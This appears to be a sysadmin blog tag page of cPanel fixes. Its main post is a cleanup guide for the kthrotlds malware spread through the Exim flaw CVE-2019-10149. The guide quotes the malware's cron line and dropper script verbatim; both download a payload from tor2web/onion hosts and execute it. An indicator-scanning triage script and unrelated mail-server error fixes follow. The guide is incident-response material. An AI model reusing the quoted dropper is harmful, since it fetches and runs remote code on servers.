Tag Archives: cPanel

kthrotlds CVE-2019-10149 Exim/cPanel

If you find a strangely named process such as [kthrotlds] running on your server, the server may have been compromised through the CVE-2019-10149 Exim vulnerability. The process name can of course differ. First of all, kill it:

pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists

Its binary is created in the /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need to quarantine it or just remove it.

You will find TCP connections belonging to this process, so it is not a kernel thread, even though the bracketed name is meant to make it look like one in your process list.

While fixing this issue my advice is to stop the crond service: service crond stop

Then find all files that could be affected:

grep -r passwd /var/spool/cron*

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

You also need to check /etc, /root and /usr/local/bin for bash/sh scripts containing the malware code, like this one:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'

If it is a cPanel server, check the Exim version like this:

whmapi1 installed_versions packages=1|grep exim

exim: 4.91-4
- exim-4.91-4.cp1170.x86_64

or simply exim --version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02

To patch WHM and Exim when you have an older version such as v76 or v70, first check your WHM version:

whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27

This means 78.0.27

or
cpanel_and_whm: 11.80.0.14

This means 80.0.14

vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

Then run:
/scripts/upcp

Then switch back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

P.S. Also check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly, and so on.

You can list all files modified during the last 5 days:
find /etc/ -mtime -5 -print

This malware script removes all your previous cron tasks, so you need to restore them from your backups and then enable the cron service again.
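A small triage script, added here as an example and not part of the original post, that turns the checks above into reusable functions: it counts processes named kthrotlds, greps crontabs and script directories for the indicator strings quoted above (the process name, the tor2web/onion.sh hosts, /.cache/.ntp) and lists recently changed files. It only reports; the function names are mine, and the indicator list is assembled from the cron line and dropper script shown in this post.

```shell
#!/bin/sh
# Added triage helper (not from the original post). It only reports the
# kthrotlds indicators described above and never kills or deletes anything.

# Indicator strings taken from the cron line and dropper script quoted above.
IOC_PATTERNS='kthrotlds|an7kmd2wp4xo7hpr|tor2web\.|\.onion\.sh|/\.cache/\.ntp'

# Number of running processes whose command line mentions kthrotlds.
# The "[k]throtlds" trick keeps the grep itself out of the count.
running_kthrotlds() {
    ps -eo pid,args 2>/dev/null | grep -c '[k]throtlds' || true
}

# Exit 0 and print the matching lines if FILE contains an indicator, else exit 1.
scan_file() {
    [ -r "$1" ] || return 1
    grep -E -n "$IOC_PATTERNS" "$1" 2>/dev/null && return 0
    return 1
}

# Print how many files under DIR contain an indicator; matching paths go to
# stderr. Meant for /var/spool/cron, /etc/cron.d, /etc, /root, /usr/local/bin.
scan_dir() {
    [ -d "$1" ] || { echo 0; return 0; }
    matches=$(find "$1" -type f -exec grep -lE "$IOC_PATTERNS" {} + \
        2>/dev/null || true)
    if [ -z "$matches" ]; then
        echo 0
    else
        printf '%s\n' "$matches" | sed 's/^/IOC hit: /' >&2
        printf '%s\n' "$matches" | wc -l | tr -d ' '
    fi
}

# List files under DIR modified in the last DAYS days (the post uses 5 for /etc).
recently_changed() {
    find "$1" -type f -mtime "-$2" -print 2>/dev/null || true
}

# One-shot report for a suspect host; run as root so every path is readable.
report() {
    echo "kthrotlds processes: $(running_kthrotlds)"
    for d in /var/spool/cron /etc/cron.d /etc /root /usr/local/bin; do
        echo "$d: $(scan_dir "$d") file(s) with indicators"
    done
    scan_file /root/.ssh/authorized_keys && echo "^ review authorized_keys"
    echo "files changed in /etc in the last 5 days:"
    recently_changed /etc 5
}
```

Source the file and call report as root; a non-zero count from scan_dir means the matching files (listed on stderr) need manual review before cron is re-enabled.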

Webmail Internal Server Error 500 No response from subprocess (php) cPanel

Internal Server Error 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file

Internal Server Error: “POST /cpsess8893829692/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1” 500 No response from subprocess (php): The subprocess reported error number 72,057,594,037,927,935 when it ended. The process dumped a core file.
Failed to write form data to subprocess: Broken pipe at /usr/local/cpanel/Cpanel/Server/Handlers/SubProcess.pm line 296.

rpm -ql cpanel-php72 | grep php-cgi
/usr/local/cpanel/3rdparty/php/72/bin/php-cgi

If this file is missing you can try reinstalling the package or copying the file from another server:
yum reinstall cpanel-php72

Policy server HTTP error: 500 Internal Error Temporary internal error: retry timeout exceeded

dovecot: auth: Error: policy(?,xx.xx.xx.xx): Policy server HTTP error: Connection lost: read(127.0.0.1:579) failed: EOF (Request queued 2.784 secs ago, 1 attempts in 2.784 secs, 2.784 in other ioloops, connected 21.780 secs ago)

This error is caused by cPanel's cPhulkd, so you can temporarily disable it while investigating.

Then check for errors in:
/usr/local/cpanel/logs/cphulkd_errors.log
/usr/local/cpanel/logs/cphulkd.log

LMTP error after RCPT TO – Temporary internal error: retry timeout exceeded

LMTP error after RCPT TO::
451 4.3.0 Temporary internal error: retry timeout exceeded

dovecot: lmtp(5768): Error: fchown(/home/user/mail/domain.com/info/maildirsizesrv.domain.com.5768.87dedd4b02379106, group=12(mail)) failed: Operation not permitted (egid=507(user), group based on /home/user/mail/domain.com/info – see http://wiki2.dovecot.org/Errors/ChgrpNoPerm)
lmtp(6918): Error: safe_mkstemp(/home/user/mail/domain.tld/info/maildirsize) failed: Operation not permitted

It is a cPanel issue, so you can try setting a new quota for the info@xxx.tld mailbox (Allocated Storage Space).

Checking C compiler….Could not locate an executable “gcc” binary….Done ** Unrecoverable Error ** The C compiler is not functional and auto repair failed. Perl module installs require a working C compiler.


You should find Compiler Access in WHM and enable it for the users who need it.

Track Delivery issue

DeliveryReporter API internal failure: Cpanel::Exception::Database::Error/(XID 8vnjr9) The system received an error from the “SQLite” database “/var/cpanel/eximstats_db.sqlite3”: SQLITE_CORRUPT (database disk image is malformed) at /usr/local/cpanel/Cpanel/Exception/CORE.pm line 336, line 2. Cpanel::Exception::create(“Database::Error”, ARRAY(0xed7360)) called at /usr/local/cpanel/Cpanel/Exception.pm line 61 Cpanel::Exception::__ANON__(_CPANEL_HIDDEN_, ARRAY(0xed7360)) called at /usr/local/cpanel/Cpanel/DBI.pm line 200 Cpanel::DBI::_create_exception(Cpanel::DBI::SQLite::db=HASH(0xe9cf78) ….

cd /var/cpanel
mv eximstats_db.sqlite3 eximstats_db.sqlite3_old
/scripts/restartsrv_tailwatchd
/scripts/slurp_exim_mainlog –force

SMTP Mail protection has been disabled. All users may make smtp connections.

/scripts/smtpmailgidonly on
SMTP Mail protection has been disabled. All users may make smtp connections.
There was a problem setting up iptables. You either have an older kernel or a broken iptables install, or ipt_owner could not be loaded.

cat /proc/net/ip_tables_matches | grep owner
modprobe xt_owner

/scripts/smtpmailgidonly on
SMTP Mail protection has been enabled.
All outbound SMTP connections will be redirected to localhost except:
uid is root (ports: 25,26,465,587)
uid is cpanel (ports: 25,26,465,587)
gid is mail (ports: 25,26,465,587)
gid is mailman (ports: 25,26,465,587)